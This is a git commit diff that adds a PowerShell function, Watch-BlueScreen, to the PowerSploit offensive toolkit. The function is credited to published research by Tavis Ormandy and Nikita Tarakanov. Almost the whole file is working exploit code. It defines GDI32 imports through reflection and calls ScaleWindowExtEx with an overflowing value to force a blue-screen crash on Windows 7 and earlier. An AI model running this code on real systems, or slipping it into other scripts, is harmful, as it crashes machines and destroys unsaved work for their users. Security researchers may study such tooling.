Added Watch-BlueScreen

Causes a blue-screen (bugcheck) to occur.

1 files changed, 74 insertions, 0 deletions

diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
new file mode 100644
index 0000000..8523bf2
--- /dev/null
+++ b/CodeExecution/Watch-BlueScreen.ps1
@@ -0,0 +1,74 @@
+function Watch-BlueScreen
+{
+<#
+.SYNOPSIS
+
+    Cause a blue screen to occur (Windows 7 and below).
+
+    PowerSploit Function: Watch-BlueScreen
+    Author: Matthew Graeber (@mattifestation)
+    Original Research: Tavis Ormandy and Nikita Tarakanov
+    License: BSD 3-Clause
+    Required Dependencies: None
+    Optional Dependencies: None
+
+.NOTES
+
+    Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
+    ‏tweeted this technique on 5/13/2013.
+
+.LINK
+
+    https://gist.github.com/taviso/4658638
+    http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
+    https://twitter.com/NTarakanov/status/334031968465453057
+#>
+
+    try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
+    {
+        $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
+        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
+        $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
+
+        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
+                                                                                          [Reflection.FieldInfo[]]@($SetLastError), @($true))
+
+        $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [IntPtr],
+                                          @([IntPtr]),
+                                          'Winapi',
+                                          'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
+
+        $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [UInt32],
+                                          @([IntPtr], [UInt32]),
+                                          'Winapi',
+                                          'Auto' ) | Out-Null
+
+        $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
+                                          'Gdi32.dll',
+                                          'Public, Static',
+                                          'Standard',
+                                          [Bool],
+                                          @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
+                                          'Winapi',
+                                          'Auto' ) | Out-Null
+
+        $Gdi32 = $TypeBuilder.CreateType()
+    }
+
+    $LAYOUT_RTL = 1
+
+    $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
+    $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
+    $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
+}
\ No newline at end of file